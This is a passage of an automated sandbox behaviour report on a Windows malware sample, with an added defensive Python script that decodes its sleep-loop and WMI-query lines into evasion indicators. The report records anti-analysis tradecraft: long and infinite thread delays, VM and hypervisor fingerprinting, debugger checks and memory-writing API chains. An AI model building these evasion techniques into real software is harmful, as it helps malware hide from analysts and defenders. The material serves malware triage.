Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -1199110s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -1199000s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -1198888s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -1198781s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -1198657s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -1198532s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -1198422s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -1198297s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -1198185s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -1198078s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -1197954s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -1197836s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -1197730s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -1197586s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -1197471s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -1197344s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -1197235s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -1197094s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -1196985s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -1196875s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\Public\Libraries\bwsiuvcU.pif WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\Public\Libraries\bwsiuvcU.pif WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\Public\Libraries\bwsiuvcU.pif WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\bwsiuvcU.pif WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\bwsiuvcU.pif WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\bwsiuvcU.pif WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\bwsiuvcU.pif WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\bwsiuvcU.pif WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
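The sleep values in the block above are easier to act on once decoded, and the units deserve a caveat: despite the "s" suffix the numbers are milliseconds (the signature's -30000 threshold is 30 s), and 922337203685477 is 2^63 / 10^4, i.e. the largest relative interval NtDelayExecution accepts (its LARGE_INTEGER argument counts 100 ns ticks and a negative value means "relative") converted to ms. The larger figures are exact multiples of that sentinel, which is how the report sums repeated identical waits on one thread: TID 5352's 29514790517935264 is 32 × 922337203685477 and lines up with that thread's "Thread sleep count: 32" entry, TID 4908's value is 29 × it, and powershell TID 1836's is 3 × it. The Python below is an added triage helper, not part of the Joe Sandbox report or of the sample's own code; it assumes the line shapes printed on this page (tolerating the trailing "Jump to behavior" link label that HTML exports carry), the FINGERPRINT_CLASSES set is my own list, and the embedded sample lines are a constructed subset copied from the report above.

```python
"""Added triage helper: decode Joe Sandbox 'Thread sleep time', 'Thread sleep
count' and 'WMI Queries' lines into per-process evasion indicators."""
import re
from collections import defaultdict

# NtDelayExecution takes a LARGE_INTEGER in 100 ns units; negative = relative.
# The report prints the interval in ms, so the largest relative wait (2**63)
# becomes this sentinel; repeated identical waits are summed per thread, which
# is why exact multiples (3x, 20x, 29x, 32x) show up in the report above.
INFINITE_MS = 2**63 // 10_000   # 922337203685477
THRESHOLD_MS = 30_000           # the "-30000s" limit the signature tests

# Line shapes as printed on this page; the link label suffix is optional.
_TAIL = r"(?: Jump to behavior)?$"
SLEEP_TIME = re.compile(r"^Source: (?P<proc>.+?) TID: (?P<tid>\d+) "
                        r"Thread sleep time: -(?P<ms>\d+)s >= -30000s" + _TAIL)
SLEEP_COUNT = re.compile(r"^Source: (?P<proc>.+?) TID: (?P<tid>\d+) "
                         r"Thread sleep count: (?P<n>\d+) > 30" + _TAIL)
WMI_QUERY = re.compile(r"^Source: (?P<proc>.+?) WMI Queries: IWbemServices::"
                       r"(?P<method>\w+) - (?P<ns>\S+) : (?P<rest>.+?)" + _TAIL)

# Assumption: my own list of WMI classes commonly read to tell a VM from real
# hardware (BaseBoard and Processor are the two queried in this report).
FINGERPRINT_CLASSES = {"Win32_BaseBoard", "Win32_Processor", "Win32_BIOS",
                       "Win32_ComputerSystem", "Win32_DiskDrive", "Win32_NetworkAdapter"}


def decode_sleep_ms(ms):
    """(infinite waits, remaining finite ms): 26747778906878833 -> (29, 0)."""
    return divmod(ms, INFINITE_MS)


def wmi_class(rest):
    """Class name from 'Win32_BaseBoard' or 'SELECT * FROM Win32_Processor'."""
    m = re.search(r"\bFROM\s+(\w+)", rest, re.IGNORECASE)
    return m.group(1) if m else rest.split()[0]


def _new_thread():
    return {"infinite_waits": 0, "finite_ms": 0, "long_sleeps": 0, "loop_iterations": 0}


def analyze(lines):
    """Return {process: {"threads": {tid: stats}, "wmi_fingerprint": set}}."""
    report = defaultdict(lambda: {"threads": defaultdict(_new_thread),
                                  "wmi_fingerprint": set()})
    for line in lines:
        line = line.strip()
        if m := SLEEP_TIME.match(line):
            infinite, finite = decode_sleep_ms(int(m["ms"]))
            t = report[m["proc"]]["threads"][m["tid"]]
            t["infinite_waits"] += infinite
            t["finite_ms"] += finite
            if finite >= THRESHOLD_MS:        # a real sleep past the threshold
                t["long_sleeps"] += 1
        elif m := SLEEP_COUNT.match(line):
            t = report[m["proc"]]["threads"][m["tid"]]
            t["loop_iterations"] = max(t["loop_iterations"], int(m["n"]))
        elif m := WMI_QUERY.match(line):
            cls = wmi_class(m["rest"])
            if cls in FINGERPRINT_CLASSES:
                report[m["proc"]]["wmi_fingerprint"].add(cls)
    return report


def verdict(report):
    """Condense per-thread stats into the tags an analyst acts on."""
    tags = {}
    for proc, info in report.items():
        threads = info["threads"].values()
        infinite = sum(t["infinite_waits"] for t in threads)
        finite_ms = sum(t["finite_ms"] for t in threads)
        loops = max((t["loop_iterations"] for t in threads), default=0)
        found = []
        if infinite:
            found.append(f"{infinite} infinite NtDelayExecution waits")
        if finite_ms >= THRESHOLD_MS:
            found.append(f"{finite_ms / 1000:.0f}s of finite sleeps")
        if loops > 30:
            found.append(f"sleep loop x{loops}")
        if info["wmi_fingerprint"]:
            found.append("WMI hw fingerprint: " + ", ".join(sorted(info["wmi_fingerprint"])))
        tags[proc] = found
    return tags


# Constructed sample: a subset of lines copied from the report above.
SAMPLE = r"""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1836 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7636 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -100000s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 4908 Thread sleep time: -1200000s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep count: 32 > 30
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 5352 Thread sleep time: -29514790517935264s >= -30000s
Source: C:\Users\Public\Libraries\bwsiuvcU.pif TID: 7992 Thread sleep count: 6521 > 30
Source: C:\Users\Public\Libraries\bwsiuvcU.pif WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\Public\Libraries\bwsiuvcU.pif WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
""".strip().splitlines()

if __name__ == "__main__":
    for proc, found in verdict(analyze(SAMPLE)).items():
        print(proc, "->", "; ".join(found) or "nothing notable")
```

Run it on the full behaviour listing (one line per entry) rather than the embedded subset; the split between infinite waits and finite sleeps matters because a thread parked on an infinite wait simply never reaches its payload under the sandbox clock, whereas the decreasing 1200000 / 100000 ms runs are countdowns that a longer analysis window or sleep skipping can defeat.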
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Last function: Thread delayed
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Last function: Thread delayed
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Last function: Thread delayed
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_029858CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 19_2_029858CC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 100000
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99872
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99749
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99640
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99530
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99417
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99297
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99181
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99071
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98959
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98843
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98734
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98624
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98515
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98399
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98296
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98176
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98062
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97945
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97825
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97718
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97609
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97499
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97390
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97281
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97169
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97062
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 96953
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 96843
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 96734
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 96624
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 96515
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1200000
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199809
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199687
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199305
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199172
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197547
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197435
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197328
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197219
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197109
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197000
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1196880
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1196766
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1196652
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1196544
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1196403
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1196229
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1196124
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1196012
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1195854
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1195728
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1195608
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1195470
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1195295
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1195143
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1194979
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1194835
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1194719
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 100000
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99879
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99765
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99655
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99546
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99435
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99325
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99209
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99078
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98936
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98822
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98718
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98606
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98484
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98374
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98264
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98156
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98046
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97936
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97797
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97685
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97564
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97424
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97292
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97180
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1200000
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199865
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199744
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199618
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199448
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199323
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199199
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199043
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198916
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198764
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198627
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198467
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198331
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 100000
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99875
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99751
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99609
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99500
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99388
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99265
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99146
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 99019
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98890
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98781
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98672
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98562
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98453
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98342
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98218
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 98109
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97979
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97859
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97750
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97631
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97515
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97390
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 97278
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1200000
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199829
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199704
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199590
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199469
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199359
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199250
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199110
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1199000
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198888
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198781
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198657
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198532
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198422
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198297
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198185
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1198078
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197954
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197836
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197730
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197586
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197471
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197344
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197235
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1197094
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1196985
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Thread delayed: delay time: 1196875
Source: bwsiuvcU.pif, 00000019.00000002.1793876103.0000000029440000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1711636457.000000002944F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
Source: mshta.exe, 00000009.00000002.1863621793.0000019AC1767000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1858256707.0000019AC1766000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1856924692.0000019AC1757000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1757000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1863133474.0000019AC16A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1863133474.0000019AC1716000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2529557915.0000021C3382B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2531528743.0000021C38E58000.00000004.00000020.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1496845420.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1496845420.00000000007AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000011.00000002.1635136687.0000029E32767000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}n
Source: Ucvuiswb.PIF, 00000018.00000002.1625890136.00000000005FA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllvvX
Source: powershell.exe, 00000011.00000002.1635136687.0000029E3275E000.00000004.00000020.00020000.00000000.sdmp, Ucvuiswb.PIF, 0000001A.00000002.1711968278.00000000005DB000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2556758276.00000000411C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: bwsiuvcU.pif, 00000017.00000002.1683295114.0000000041300000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllaa
Source: C:\Users\user\AppData\Roaming\uc.exe API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\bwsiuvcU.pif API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\bwsiuvcU.pif API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 23_2_0040CE09
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear, 23_2_004019F0
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_02997AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary, 19_2_02997AC0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_0040ADB0 GetProcessHeap,HeapFree, 23_2_0040ADB0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Process token adjusted: Debug
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 23_2_0040CE09
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 23_2_0040E61C
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 23_2_00416F6A
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_004123F1 SetUnhandledExceptionFilter, 23_2_004123F1
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 23_1_0040CE09
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 23_1_0040E61C
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 23_1_00416F6A
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_1_004123F1 SetUnhandledExceptionFilter, 23_1_004123F1
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 25_2_0040CE09
